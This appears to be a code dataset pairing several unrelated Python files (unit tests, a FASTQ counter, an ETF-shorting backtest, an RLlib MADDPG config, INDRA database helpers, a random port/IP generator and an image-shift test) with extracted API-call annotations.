self.assertEqual(solution([4, 5, 6, 7, 0, 1, 2], 0), 4)
self.assertEqual(solution([4, 5, 6, 7, 0, 1, 2], 3), -1)
self.assertEqual(solution([3, 1], 1), 1)
self.assertEqual(solution([3, 1], 3), 0)
self.assertEqual(solution([1, 3, 5], 3), 1)
self.assertEqual(solution([3, 5, 1], 5), 1)
| [
"problems.problem10.solution"
] | [((125, 159), 'problems.problem10.solution', 'solution', (['[4, 5, 6, 7, 0, 1, 2]', '(0)'], {}), '([4, 5, 6, 7, 0, 1, 2], 0)\n', (133, 159), False, 'from problems.problem10 import solution\n'), ((183, 217), 'problems.problem10.solution', 'solution', (['[4, 5, 6, 7, 0, 1, 2]', '(3)'], {}), '([4, 5, 6, 7, 0, 1, 2], 3)\n', (191, 217), False, 'from problems.problem10 import solution\n'), ((242, 261), 'problems.problem10.solution', 'solution', (['[3, 1]', '(1)'], {}), '([3, 1], 1)\n', (250, 261), False, 'from problems.problem10 import solution\n'), ((285, 304), 'problems.problem10.solution', 'solution', (['[3, 1]', '(3)'], {}), '([3, 1], 3)\n', (293, 304), False, 'from problems.problem10 import solution\n'), ((328, 350), 'problems.problem10.solution', 'solution', (['[1, 3, 5]', '(3)'], {}), '([1, 3, 5], 3)\n', (336, 350), False, 'from problems.problem10 import solution\n'), ((374, 396), 'problems.problem10.solution', 'solution', (['[3, 5, 1]', '(5)'], {}), '([3, 5, 1], 5)\n', (382, 396), False, 'from problems.problem10 import solution\n')] |
#!/usr/bin/env python
import subprocess
import argparse
import gzip
import json
from Bio import SeqIO
def main():
parser = argparse.ArgumentParser(description='Count the number of records in a read pair')
parser.add_argument('--R1', dest='r1', required=True)
parser.add_argument('--R2', dest='r2', required=True)
args = parser.parse_args()
fastq_record_count = 0
for rx in (args.r1, args.r2):
with open(rx) as infile:
fastq_record_count += sum(1 for record in SeqIO.parse(infile, 'fastq'))
with open('output.json', 'w') as outfile:
json.dump({'record_count': fastq_record_count}, outfile)
if __name__ == '__main__':
main()
| [
"json.dump",
"Bio.SeqIO.parse",
"argparse.ArgumentParser"
] | [((129, 215), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Count the number of records in a read pair"""'}), "(description=\n 'Count the number of records in a read pair')\n", (152, 215), False, 'import argparse\n'), ((592, 648), 'json.dump', 'json.dump', (["{'record_count': fastq_record_count}", 'outfile'], {}), "({'record_count': fastq_record_count}, outfile)\n", (601, 648), False, 'import json\n'), ((507, 535), 'Bio.SeqIO.parse', 'SeqIO.parse', (['infile', '"""fastq"""'], {}), "(infile, 'fastq')\n", (518, 535), False, 'from Bio import SeqIO\n')] |
import unittest
import fibonacci
class TestFibonacciMethods(unittest.TestCase):
def test_calc(self):
res = fibonacci.sequence_calc(10)
self.assertEqual(res, [0, 1, 1, 2, 3, 5, 8, 13, 21, 34])
def test_check_true(self):
res = fibonacci.check_number(55)[0]
self.assertTrue(res)
def test_check_false(self):
res = fibonacci.check_number(67)[0]
self.assertFalse(res)
"""
Other corner cases (for example, passing a string, a negative integer, or a float as an argument) are handled by the argparse library.
"""
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"fibonacci.sequence_calc",
"fibonacci.check_number"
] | [((659, 674), 'unittest.main', 'unittest.main', ([], {}), '()\n', (672, 674), False, 'import unittest\n'), ((121, 148), 'fibonacci.sequence_calc', 'fibonacci.sequence_calc', (['(10)'], {}), '(10)\n', (144, 148), False, 'import fibonacci\n'), ((265, 291), 'fibonacci.check_number', 'fibonacci.check_number', (['(55)'], {}), '(55)\n', (287, 291), False, 'import fibonacci\n'), ((371, 397), 'fibonacci.check_number', 'fibonacci.check_number', (['(67)'], {}), '(67)\n', (393, 397), False, 'import fibonacci\n')] |
#model impact of shorting offseting leveraged daily etfs
#break even around short borrow rates 7-10%
import numpy as np
import pandas as pd
# import beautifulsoup4
import lxml.html
import requests
# import requests_cache
import re
import math
from datetime import datetime
import time
import random
from collections import namedtuple, Counter
import pickle
import os
import sys
import win32com.client
import matplotlib.pyplot as plt
github_dir = "c:\\Users\\student.DESKTOP-UT02KBN\\MSTG"
os.chdir(f"{github_dir}\\short_inverse")
#Note: Portfolios are not identical (long gets exposure w/ swaps & long nat gas)
long2x = pd.read_csv("UCO_hist.csv",
parse_dates=['Date'])
long2x.set_index("Date", inplace=True)
short2x = pd.read_csv("SCO_hist.csv",
parse_dates=['Date'])
short2x.set_index("Date", inplace=True)
#this varies a lot; need to improve
l_borrow_rate = pd.Series([0.0190 + 0.06]*len(long2x),
index = long2x.index)
#borrow rate till next price (so longer for weekends/holidays)
#last entry is 0; borrow rate for day 0 is cost to borrow till day 1
days = list((l_borrow_rate.index[:-1] - l_borrow_rate.index[1:]
)//np.timedelta64(1, 'D')) + [0]
#rate given is APR; a periodic rate. cost till next day
long2x['Borrow'] = [(1+r)**(d/365) -1 for r,d in zip(days, l_borrow_rate)]
s_borrow_rate = pd.Series([0.0334 + 0.06]*len(short2x),
index = short2x.index)
days = list((s_borrow_rate.index[:-1] - s_borrow_rate.index[1:]
)//np.timedelta64(1, 'D')) + [0]
short2x['Borrow'] = [(1+r)**(d/365) -1 for r,d in zip(days, s_borrow_rate)]
shale_start_date = datetime(year=2015, month=1, day=1)
neg_prices_date = datetime(year=2020, month=3, day=1)
long2x = long2x[(long2x.index >= shale_start_date) \
& (long2x.index <= neg_prices_date)]
short2x= short2x[(short2x.index >= shale_start_date) \
& (short2x.index <= neg_prices_date)]
long2x.columns = [f"L_{i}" for i in long2x.columns ]
short2x.columns = [f"S_{i}" for i in short2x.columns]
df = long2x.join(short2x, how='inner')
df = df.iloc[::-1]#earliest dates first
#%%
initial = 100000
cash = initial
leverage = 2#total market positions n* cash buffer
acnt_value = []
#no overnight position
for index, row in df.iterrows():
buffer = cash*leverage/2
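# Short an equal dollar amount of each leveraged ETF at the open.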
l_pos = -buffer//row['L_Open']
s_pos = -buffer//row['S_Open']
# cash = (buffer % row['L_open']) + (buffer % row['S_open']) #what not invested initially
cash += l_pos *(row['L_Close'] - row['L_Open'])
cash += s_pos *(row['S_Close'] - row['S_Open'])
cash += row['L_Borrow'] * l_pos * row['L_Open'] \
+ row['S_Borrow'] * s_pos * row['S_Open']
if cash <= 0:
cash = 0
acnt_value += [cash]
acnt_value = pd.Series(acnt_value, index = df.index)
plt.plot(acnt_value, label="Close@ EOD")
plt.show()
print(acnt_value[-1]/initial, np.std(acnt_value.pct_change()))
cash = initial
acnt_value = []
#rebalance every morning: look at M2M and adjust size
l_pos, s_pos = 0,0
for index, row in df.iterrows():
m2m = cash + l_pos*row['L_Open'] + s_pos*row['S_Open']#marked 2 market portfolio
buffer = m2m*leverage/2
l_t = -buffer//row['L_Open']
s_t = -buffer//row['S_Open']
cash += (l_pos - l_t)*row['L_Open'] \
+ (s_pos - s_t)*row['S_Open']
l_pos, s_pos = l_t, s_t
cash += row['L_Borrow'] * l_pos * row['L_Open'] \
+ row['S_Borrow'] * s_pos * row['S_Open']
if cash <= 0:
cash = 0
# l_pos = 0
# s_pos = 0
acnt_value += [cash + l_pos*row['L_Close'] + s_pos*row['S_Close']]#evening m2m
acnt_value = pd.Series(acnt_value, index = df.index)
plt.plot(acnt_value, label = "Daily Morning Rebalance")
plt.legend()
plt.show()
print(acnt_value[-1]/initial, np.std(acnt_value.pct_change()))
#Seems like free money?
| [
"datetime.datetime",
"pandas.Series",
"pandas.read_csv",
"matplotlib.pyplot.plot",
"os.chdir",
"numpy.timedelta64",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] | [((492, 532), 'os.chdir', 'os.chdir', (['f"""{github_dir}\\\\short_inverse"""'], {}), "(f'{github_dir}\\\\short_inverse')\n", (500, 532), False, 'import os\n'), ((624, 673), 'pandas.read_csv', 'pd.read_csv', (['"""UCO_hist.csv"""'], {'parse_dates': "['Date']"}), "('UCO_hist.csv', parse_dates=['Date'])\n", (635, 673), True, 'import pandas as pd\n'), ((744, 793), 'pandas.read_csv', 'pd.read_csv', (['"""SCO_hist.csv"""'], {'parse_dates': "['Date']"}), "('SCO_hist.csv', parse_dates=['Date'])\n", (755, 793), True, 'import pandas as pd\n'), ((1681, 1716), 'datetime.datetime', 'datetime', ([], {'year': '(2015)', 'month': '(1)', 'day': '(1)'}), '(year=2015, month=1, day=1)\n', (1689, 1716), False, 'from datetime import datetime\n'), ((1735, 1770), 'datetime.datetime', 'datetime', ([], {'year': '(2020)', 'month': '(3)', 'day': '(1)'}), '(year=2020, month=3, day=1)\n', (1743, 1770), False, 'from datetime import datetime\n'), ((2815, 2852), 'pandas.Series', 'pd.Series', (['acnt_value'], {'index': 'df.index'}), '(acnt_value, index=df.index)\n', (2824, 2852), True, 'import pandas as pd\n'), ((2855, 2895), 'matplotlib.pyplot.plot', 'plt.plot', (['acnt_value'], {'label': '"""Close@ EOD"""'}), "(acnt_value, label='Close@ EOD')\n", (2863, 2895), True, 'import matplotlib.pyplot as plt\n'), ((2896, 2906), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2904, 2906), True, 'import matplotlib.pyplot as plt\n'), ((3678, 3715), 'pandas.Series', 'pd.Series', (['acnt_value'], {'index': 'df.index'}), '(acnt_value, index=df.index)\n', (3687, 3715), True, 'import pandas as pd\n'), ((3718, 3771), 'matplotlib.pyplot.plot', 'plt.plot', (['acnt_value'], {'label': '"""Daily Morning Rebalance"""'}), "(acnt_value, label='Daily Morning Rebalance')\n", (3726, 3771), True, 'import matplotlib.pyplot as plt\n'), ((3774, 3786), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (3784, 3786), True, 'import matplotlib.pyplot as plt\n'), ((3787, 3797), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3795, 3797), True, 'import matplotlib.pyplot as plt\n'), ((1208, 1230), 'numpy.timedelta64', 'np.timedelta64', (['(1)', '"""D"""'], {}), "(1, 'D')\n", (1222, 1230), True, 'import numpy as np\n'), ((1555, 1577), 'numpy.timedelta64', 'np.timedelta64', (['(1)', '"""D"""'], {}), "(1, 'D')\n", (1569, 1577), True, 'import numpy as np\n')] |
from ray.rllib.agents.trainer import with_common_config
MADDPG_CONFIG = with_common_config({
# === MADDPG ===
"gamma": 0.95,
# Optimize over complete episodes by default.
"batch_mode": "complete_episodes",
# === Evaluation ===
# Evaluate with epsilon=0 every `evaluation_interval` training iterations.
# The evaluation stats will be reported under the "evaluation" metric key.
# Note that evaluation is currently not parallelized, and that for Ape-X
# metrics are already only reported for the lowest epsilon workers.
"evaluation_interval": None,
# Number of episodes to run per evaluation period.
"evaluation_num_episodes": 10,
# === Exploration ===
# Max num timesteps for annealing schedules. Exploration is annealed from
# 1.0 to exploration_fraction over this number of timesteps scaled by
# exploration_fraction
"schedule_max_timesteps": 100000,
# Number of env steps to optimize for before returning
"timesteps_per_iteration": 1000,
# Fraction of entire training period over which the exploration rate is
# annealed
"exploration_fraction": 0.1,
# Final value of random action probability
"exploration_final_eps": 0.1,
# Update the target network every `target_network_update_freq` steps.
"target_network_update_freq": 0,
# Update the target by \tau * policy + (1-\tau) * target_policy
"tau": 0.001,
# Target noise scale in target policy smoothing
"target_noise_scale": 0.2,
# === Replay buffer ===
# Size of the replay buffer
"buffer_size": 10000,
# === Optimization ===
# Learning rate for adam optimizer
"actor_lr": 0.001,
"critic_lr": 0.0003,
# If not None, clip gradients during optimization at this value
"grad_norm_clipping": 10,
# How many steps of the model to sample before learning starts.
"learning_starts": 1000,
# Update the replay buffer with this many samples at once. Note that
# this setting applies per-worker if num_workers > 1.0
"sample_batch_size": 1,
# Size of a batched sampled from replay buffer for training. Note that
# if async_updates is set, then each worker returns gradients for a
# batch of this size.
"train_batch_size": 32,
# === Parallelism ===
# Number of workers for collecting samples with. This only makes sense
# to increase if your environment is particularly slow to sample, or if
# you"re using the Async or Ape-X optimizers.
"num_workers": 0,
# Whether to use a distribution of epsilons across workers for exploration.
"per_worker_exploration": False,
# Whether to compute priorities on workers.
"worker_side_prioritization": False,
# Prevent iterations from going lower than this time span
"min_iter_time_s": 1,
# === Model ===
# Actor
"actor_model": {
"fcnet_activation": "relu",
"fcnet_hiddens": [64, 64],
},
# Critic
"critic_model": {
"fcnet_activation": "relu",
"fcnet_hiddens": [64, 64],
},
})
| [
"ray.rllib.agents.trainer.with_common_config"
] | [((75, 863), 'ray.rllib.agents.trainer.with_common_config', 'with_common_config', (["{'gamma': 0.95, 'batch_mode': 'complete_episodes', 'evaluation_interval':\n None, 'evaluation_num_episodes': 10, 'schedule_max_timesteps': 100000,\n 'timesteps_per_iteration': 1000, 'exploration_fraction': 0.1,\n 'exploration_final_eps': 0.1, 'target_network_update_freq': 0, 'tau': \n 0.001, 'target_noise_scale': 0.2, 'buffer_size': 10000, 'actor_lr': \n 0.001, 'critic_lr': 0.0003, 'grad_norm_clipping': 10, 'learning_starts':\n 1000, 'sample_batch_size': 1, 'train_batch_size': 32, 'num_workers': 0,\n 'per_worker_exploration': False, 'worker_side_prioritization': False,\n 'min_iter_time_s': 1, 'actor_model': {'fcnet_activation': 'relu',\n 'fcnet_hiddens': [64, 64]}, 'critic_model': {'fcnet_activation': 'relu',\n 'fcnet_hiddens': [64, 64]}}"], {}), "({'gamma': 0.95, 'batch_mode': 'complete_episodes',\n 'evaluation_interval': None, 'evaluation_num_episodes': 10,\n 'schedule_max_timesteps': 100000, 'timesteps_per_iteration': 1000,\n 'exploration_fraction': 0.1, 'exploration_final_eps': 0.1,\n 'target_network_update_freq': 0, 'tau': 0.001, 'target_noise_scale': \n 0.2, 'buffer_size': 10000, 'actor_lr': 0.001, 'critic_lr': 0.0003,\n 'grad_norm_clipping': 10, 'learning_starts': 1000, 'sample_batch_size':\n 1, 'train_batch_size': 32, 'num_workers': 0, 'per_worker_exploration': \n False, 'worker_side_prioritization': False, 'min_iter_time_s': 1,\n 'actor_model': {'fcnet_activation': 'relu', 'fcnet_hiddens': [64, 64]},\n 'critic_model': {'fcnet_activation': 'relu', 'fcnet_hiddens': [64, 64]}})\n", (93, 863), False, 'from ray.rllib.agents.trainer import with_common_config\n')] |
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import logging
from collections import defaultdict
from indra.databases import hgnc_client
from indra.db import util as db_util
logger = logging.getLogger('db_client')
def get_reader_output(db, ref_id, ref_type='tcid', reader=None,
reader_version=None):
"""Return reader output for a given text content.
Parameters
----------
db : :py:class:`DatabaseManager`
Reference to the DB to query
ref_id : int or str
The text reference ID whose reader output should be returned
ref_type : Optional[str]
The type of ID to look for, options include
'tcid' for the database's internal unique text content ID,
or 'pmid', 'pmcid', 'doi, 'pii', 'manuscript_id'
Default: 'tcid'
reader : Optional[str]
The name of the reader whose output is of interest
reader_version : Optional[str]
The specific version of the reader
Returns
-------
reading_results : dict{dict{list[str]}}
A dict of reader outputs that match the query criteria, indexed first
by text content id, then by reader.
"""
if ref_type == 'tcid':
clauses = [db.Readings.text_content_id == ref_id]
else:
trids = _get_trids(db, ref_id, ref_type)
if not trids:
return []
logger.debug("Found %d text ref ids." % len(trids))
clauses = [db.TextContent.text_ref_id.in_(trids),
db.Readings.text_content_id == db.TextContent.id]
if reader:
clauses.append(db.Readings.reader == reader.upper())
if reader_version:
clauses.append(db.Readings.reader_version == reader_version)
res = db.select_all([db.Readings.text_content_id, db.Readings.reader,
db.Readings.bytes], *clauses)
reading_dict = defaultdict(lambda: defaultdict(lambda: []))
for tcid, reader, result in res:
reading_dict[tcid][reader].append(db_util.unpack(result))
return reading_dict
def get_content_by_refs(db, pmid_list=None, trid_list=None, sources=None,
formats=None, content_type='abstract', unzip=True):
"""Return content from the database given a list of PMIDs or text ref ids.
Note that either pmid_list OR trid_list must be set, and only one can be
set at a time.
Parameters
----------
db : :py:class:`DatabaseManager`
Reference to the DB to query
pmid_list : list[str] or None
A list of pmids. Default is None, in which case trid_list must be given.
trid_list : list[int] or None
A list of text ref ids. Default is None, in which case pmid list must be
given.
sources : list[str] or None
A list of sources to include (e.g. 'pmc_oa', or 'pubmed'). Default is
None, indicating that all sources will be included.
formats : list[str]
A list of the formats to be included ('xml', 'text'). Default is None,
indicating that all formats will be included.
content_type : str
Select the type of content to load ('abstract' or 'fulltext'). Note that
not all refs will have any, or both, types of content.
unzip : Optional[bool]
If True, the compressed output is decompressed into clear text.
Default: True
Returns
-------
content_dict : dict
A dictionary whose keys are text ref ids, with each value being the
the corresponding content.
"""
# Make sure we only get one type of list.
if not (pmid_list or trid_list):
raise ValueError("One of `pmid_list` or `trid_list` must be defined.")
if pmid_list and trid_list:
raise ValueError("Only one of `pmid_list` or `trid_list` may be used.")
# Put together the clauses for the general constraints.
clauses = []
if sources is not None:
clauses.append(db.TextContent.source.in_(sources))
if formats is not None:
clauses.append(db.TextContent.format.in_(formats))
if content_type not in ['abstract', 'fulltext']:
raise ValueError("Unrecognized content type: %s" % content_type)
else:
clauses.append(db.TextContent.text_type == content_type)
# Do the query to get the content.
if pmid_list is not None:
content_list = db.select_all([db.TextRef.pmid, db.TextContent.content],
db.TextRef.id == db.TextContent.text_ref_id,
db.TextRef.pmid.in_(pmid_list),
*clauses)
else:
content_list = db.select_all([db.TextRef.id, db.TextContent.content],
db.TextContent.text_ref_id.in_(trid_list),
*clauses)
if unzip:
content_dict = {id_val: db_util.unpack(content)
for id_val, content in content_list}
else:
content_dict = {id_val: content for id_val, content in content_list}
return content_dict
#==============================================================================
# Below are some functions that are useful for getting raw statements from the
# database at various levels of abstraction.
#==============================================================================
def get_statements_by_gene_role_type(agent_id=None, agent_ns='HGNC-SYMBOL',
role=None, stmt_type=None, count=1000,
db=None, do_stmt_count=True,
preassembled=True):
"""Get statements from the DB by stmt type, agent, and/or agent role.
Parameters
----------
agent_id : str
String representing the identifier of the agent from the given
namespace. Note: if the agent namespace argument, `agent_ns`, is set
to 'HGNC-SYMBOL', this function will treat `agent_id` as an HGNC gene
symbol and perform an internal lookup of the corresponding HGNC ID.
Default is 'HGNC-SYMBOL'.
agent_ns : str
Namespace for the identifier given in `agent_id`.
role : str
String corresponding to the role of the agent in the statement.
Options are 'SUBJECT', 'OBJECT', or 'OTHER' (in the case of `Complex`,
`SelfModification`, and `ActiveForm` Statements).
stmt_type : str
Name of the Statement class.
count : int
Number of statements to retrieve in each batch (passed to
:py:func:`get_statements`).
db : :py:class:`DatabaseManager`
Optionally specify a database manager that attaches to something
besides the primary database, for example a local database instance.
do_stmt_count : bool
Whether or not to perform an initial statement counting step to give
more meaningful progress messages.
preassembled : bool
If true, statements will be selected from the table of pre-assembled
statements. Otherwise, they will be selected from the raw statements.
Default is True.
Returns
-------
list of Statements from the database corresponding to the query.
"""
if db is None:
db = db_util.get_primary_db()
if preassembled:
Statements = db.PAStatements
Agents = db.PAAgents
else:
Statements = db.Statements
Agents = db.Agents
if not (agent_id or role or stmt_type):
raise ValueError('At least one of agent_id, role, or stmt_type '
'must be specified.')
clauses = []
if agent_id and agent_ns == 'HGNC-SYMBOL':
hgnc_id = hgnc_client.get_hgnc_id(agent_id)
if not hgnc_id:
logger.warning('Invalid gene name: %s' % agent_id)
return []
clauses.extend([Agents.db_name.like('HGNC'),
Agents.db_id.like(hgnc_id)])
elif agent_id:
clauses.extend([Agents.db_name.like(agent_ns),
Agents.db_id.like(agent_id)])
if role:
clauses.append(Agents.role == role)
if agent_id or role:
clauses.append(Agents.stmt_id == Statements.id)
if stmt_type:
clauses.append(Statements.type == stmt_type)
stmts = get_statements(clauses, count=count, do_stmt_count=do_stmt_count,
db=db, preassembled=preassembled)
return stmts
def get_statements_by_paper(id_val, id_type='pmid', count=1000, db=None,
do_stmt_count=True):
"""Get the statements from a particular paper.
Note: currently this can only retrieve raw statements, because of the
partially implemented configuration of the pre-assembled Statement table.
Parameters
----------
id_val : int or str
The value of the id for the paper whose statements you wish to retrieve.
id_type : str
The type of id used (default is pmid). Options include pmid, pmcid, doi,
pii, url, or manuscript_id. Note that pmid is generally the best means
of getting a paper.
count : int
Number of statements to retrieve in each batch (passed to
:py:func:`get_statements`).
db : :py:class:`DatabaseManager`
Optionally specify a database manager that attaches to something
besides the primary database, for example a local database instance.
do_stmt_count : bool
Whether or not to perform an initial statement counting step to give
more meaningful progress messages.
Returns
-------
A list of Statements from the database corresponding to the paper id given.
"""
if db is None:
db = db_util.get_primary_db()
trid_list = _get_trids(db, id_val, id_type)
if not trid_list:
return None
stmts = []
for trid in trid_list:
clauses = [
db.TextContent.text_ref_id == trid,
db.Readings.text_content_id == db.TextContent.id,
db.Statements.reader_ref == db.Readings.id
]
stmts.extend(get_statements(clauses, count=count, preassembled=False,
do_stmt_count=do_stmt_count, db=db))
return stmts
def get_statements(clauses, count=1000, do_stmt_count=True, db=None,
preassembled=True):
"""Select statements according to a given set of clauses.
Parameters
----------
clauses : list
list of sqlalchemy WHERE clauses to pass to the filter query.
count : int
Number of statements to retrieve and process in each batch.
do_stmt_count : bool
Whether or not to perform an initial statement counting step to give
more meaningful progress messages.
db : :py:class:`DatabaseManager`
Optionally specify a database manager that attaches to something
besides the primary database, for example a local database instance.
preassembled : bool
If true, statements will be selected from the table of pre-assembled
statements. Otherwise, they will be selected from the raw statements.
Default is True.
Returns
-------
list of Statements from the database corresponding to the query.
"""
if db is None:
db = db_util.get_primary_db()
stmts_tblname = 'pa_statements' if preassembled else 'statements'
stmts = []
q = db.filter_query(stmts_tblname, *clauses)
if do_stmt_count:
logger.info("Counting statements...")
num_stmts = q.count()
logger.info("Total of %d statements" % num_stmts)
db_stmts = q.yield_per(count)
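# Stream rows from the database and convert them to INDRA Statements one batch of `count` at a time.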
subset = []
total_counter = 0
for stmt in db_stmts:
subset.append(stmt)
if len(subset) == count:
stmts.extend(db_util.make_stmts_from_db_list(subset))
subset = []
total_counter += 1
if total_counter % count == 0:
if do_stmt_count:
logger.info("%d of %d statements" % (total_counter, num_stmts))
else:
logger.info("%d statements" % total_counter)
stmts.extend(db_util.make_stmts_from_db_list(subset))
return stmts
def _get_trids(db, id_val, id_type):
"""Return text ref IDs corresponding to any ID type and value."""
# Get the text ref id(s)
if id_type in ['trid']:
trid_list = [int(id_val)]
else:
id_types = ['pmid', 'pmcid', 'doi', 'pii', 'url', 'manuscript_id']
if id_type not in id_types:
raise ValueError('id_type must be one of: %s' % str(id_types))
constraint = (getattr(db.TextRef, id_type) == id_val)
trid_list = [trid for trid, in db.select_all(db.TextRef.id, constraint)]
return trid_list
| [
"logging.getLogger",
"indra.db.util.unpack",
"indra.databases.hgnc_client.get_hgnc_id",
"indra.db.util.make_stmts_from_db_list",
"builtins.str",
"collections.defaultdict",
"indra.db.util.get_primary_db"
] | [((244, 274), 'logging.getLogger', 'logging.getLogger', (['"""db_client"""'], {}), "('db_client')\n", (261, 274), False, 'import logging\n'), ((7251, 7275), 'indra.db.util.get_primary_db', 'db_util.get_primary_db', ([], {}), '()\n', (7273, 7275), True, 'from indra.db import util as db_util\n'), ((7683, 7716), 'indra.databases.hgnc_client.get_hgnc_id', 'hgnc_client.get_hgnc_id', (['agent_id'], {}), '(agent_id)\n', (7706, 7716), False, 'from indra.databases import hgnc_client\n'), ((9689, 9713), 'indra.db.util.get_primary_db', 'db_util.get_primary_db', ([], {}), '()\n', (9711, 9713), True, 'from indra.db import util as db_util\n'), ((11257, 11281), 'indra.db.util.get_primary_db', 'db_util.get_primary_db', ([], {}), '()\n', (11279, 11281), True, 'from indra.db import util as db_util\n'), ((12096, 12135), 'indra.db.util.make_stmts_from_db_list', 'db_util.make_stmts_from_db_list', (['subset'], {}), '(subset)\n', (12127, 12135), True, 'from indra.db import util as db_util\n'), ((1941, 1965), 'collections.defaultdict', 'defaultdict', (['(lambda : [])'], {}), '(lambda : [])\n', (1952, 1965), False, 'from collections import defaultdict\n'), ((2045, 2067), 'indra.db.util.unpack', 'db_util.unpack', (['result'], {}), '(result)\n', (2059, 2067), True, 'from indra.db import util as db_util\n'), ((4888, 4911), 'indra.db.util.unpack', 'db_util.unpack', (['content'], {}), '(content)\n', (4902, 4911), True, 'from indra.db import util as db_util\n'), ((11758, 11797), 'indra.db.util.make_stmts_from_db_list', 'db_util.make_stmts_from_db_list', (['subset'], {}), '(subset)\n', (11789, 11797), True, 'from indra.db import util as db_util\n'), ((12535, 12548), 'builtins.str', 'str', (['id_types'], {}), '(id_types)\n', (12538, 12548), False, 'from builtins import dict, str\n')] |
import random
#return a random port
def randomize_port():
return random.randint(0,65535)
def random_seq():
return random.randint(1000,9000)
def spoof_ipv4():
ipv4 = list()
    # first octet (the loop below adds the remaining three)
ipv4.append(random.randint(0,128))
for i in range(3):
ipv4.append(random.randint(0,128))
addr = str(ipv4[0])+ "." + str(ipv4[1]) + "." + str(ipv4[2]) + "." + str(ipv4[3])
return addr
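# Illustrative demo (added for clarity, not part of the original script); guarded
# so it only runs when the file is executed directly. Example outputs are hypothetical.
if __name__ == "__main__":
    print(randomize_port())  # e.g. 40213
    print(random_seq())      # e.g. 4821
    print(spoof_ipv4())      # e.g. "97.12.55.103"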
#for i in range(100):
# print(spoof_ipv4()) | [
"random.randint"
] | [((67, 91), 'random.randint', 'random.randint', (['(0)', '(65535)'], {}), '(0, 65535)\n', (81, 91), False, 'import random\n'), ((117, 143), 'random.randint', 'random.randint', (['(1000)', '(9000)'], {}), '(1000, 9000)\n', (131, 143), False, 'import random\n'), ((206, 228), 'random.randint', 'random.randint', (['(0)', '(128)'], {}), '(0, 128)\n', (220, 228), False, 'import random\n'), ((263, 285), 'random.randint', 'random.randint', (['(0)', '(128)'], {}), '(0, 128)\n', (277, 285), False, 'import random\n')] |
'''
test the shift_img function with different rng values
'''
import numpy as np
rng = 4
if rng == 1:
img = np.array([[11,12,13],
[18,00,14],
[17,16,15]])
elif rng ==2:
img = np.array([[11,12,13,14,15],
[26,00,00,00,16],
[25,00,00,00,17],
[24,00,00,00,18],
[23,22,21,20,19]])
elif rng ==3:
img = np.array([[11,12,13,14,15,16,17],
[34,00,00,00,00,00,18],
[33,00,00,00,00,00,19],
[32,00,00,00,00,00,20],
[31,00,00,00,00,00,21],
[30,00,00,00,00,00,22],
[29,28,27,26,25,24,23]])
elif rng ==4:
img = np.array([[11,12,13,14,15,16,17,18,19],
[42,00,00,00,00,00,00,00,20],
[41,00,00,00,00,00,00,00,21],
[40,00,00,00,00,00,00,00,22],
[39,00,00,00,00,00,00,00,23],
[38,00,00,00,00,00,00,00,24],
[37,00,00,00,00,00,00,00,25],
[36,00,00,00,00,00,00,00,26],
[35,34,33,32,31,30,29,28,27]])
def shift_img(img,rng):
'''
    shift (crop) the image along each of the rng*8 border directions and return the list of shifted views
'''
minimum_input_size = (rng*2)+1 # minimum input size based on rng
output_size_y = img.shape[0] - (rng*2) # expected output size after shifting
output_size_x = img.shape[1] - (rng*2) # expected output size after shifting
total_shift_direction = rng*8 # total shifting direction based on rng
# initialization
img_shift_ = []
x = -rng
y = -rng
# get shifted images if output size >0
if output_size_y>0 and output_size_x>0:
for i in range(total_shift_direction):
# get images in shifted direction
if (x<=0 and y<=0) :
if y == -rng:
img_shift = img[:y*2, rng+x:(x*2)-(rng+x)]
elif x == -rng:
img_shift = img[rng+y:(y*2)-(rng+y),:x*2]
elif x>0 and y<=0:
if x == rng:
img_shift = img[rng+y:(y*2)-(rng+y), rng+x:]
else:
img_shift = img[rng+y:(y*2)-(rng+y), rng+x:x-rng]
elif x<=0 and y>0:
if y == rng:
img_shift = img[rng+y:, rng+x:(x*2)-(rng+x)]
else:
img_shift = img[rng+y:y-rng, rng+x:(x*2)-(rng+x)]
elif x>0 and y>0:
if x == rng and y == rng:
img_shift = img[rng+y:, rng+x:]
elif x == rng:
img_shift = img[rng+y:y-rng, rng+x:]
elif y == rng:
img_shift = img[rng+y:, rng+x:x-rng]
# update x and y shifting value
if x == -rng and y>-rng:
y-=1
elif x < rng and y < rng:
x+=1
elif x >= rng and y < rng:
y+=1
elif y >= rng and x >-rng:
x-=1
img_shift_.append(img_shift)
return img_shift_
img_shift_ = shift_img(img,rng)
print(img_shift_)
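# Illustrative sanity checks (added; they follow from the slicing logic above and
# are not part of the original test script): shift_img returns rng*8 shifted
# views, each cropped to (H - 2*rng, W - 2*rng).
assert len(img_shift_) == rng * 8
assert all(s.shape == (img.shape[0] - 2 * rng, img.shape[1] - 2 * rng) for s in img_shift_)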
| [
"numpy.array"
] | [((108, 159), 'numpy.array', 'np.array', (['[[11, 12, 13], [18, 0, 14], [17, 16, 15]]'], {}), '([[11, 12, 13], [18, 0, 14], [17, 16, 15]])\n', (116, 159), True, 'import numpy as np\n'), ((221, 337), 'numpy.array', 'np.array', (['[[11, 12, 13, 14, 15], [26, 0, 0, 0, 16], [25, 0, 0, 0, 17], [24, 0, 0, 0, \n 18], [23, 22, 21, 20, 19]]'], {}), '([[11, 12, 13, 14, 15], [26, 0, 0, 0, 16], [25, 0, 0, 0, 17], [24, \n 0, 0, 0, 18], [23, 22, 21, 20, 19]])\n', (229, 337), True, 'import numpy as np\n'), ((439, 642), 'numpy.array', 'np.array', (['[[11, 12, 13, 14, 15, 16, 17], [34, 0, 0, 0, 0, 0, 18], [33, 0, 0, 0, 0, 0,\n 19], [32, 0, 0, 0, 0, 0, 20], [31, 0, 0, 0, 0, 0, 21], [30, 0, 0, 0, 0,\n 0, 22], [29, 28, 27, 26, 25, 24, 23]]'], {}), '([[11, 12, 13, 14, 15, 16, 17], [34, 0, 0, 0, 0, 0, 18], [33, 0, 0,\n 0, 0, 0, 19], [32, 0, 0, 0, 0, 0, 20], [31, 0, 0, 0, 0, 0, 21], [30, 0,\n 0, 0, 0, 0, 22], [29, 28, 27, 26, 25, 24, 23]])\n', (447, 642), True, 'import numpy as np\n'), ((776, 1097), 'numpy.array', 'np.array', (['[[11, 12, 13, 14, 15, 16, 17, 18, 19], [42, 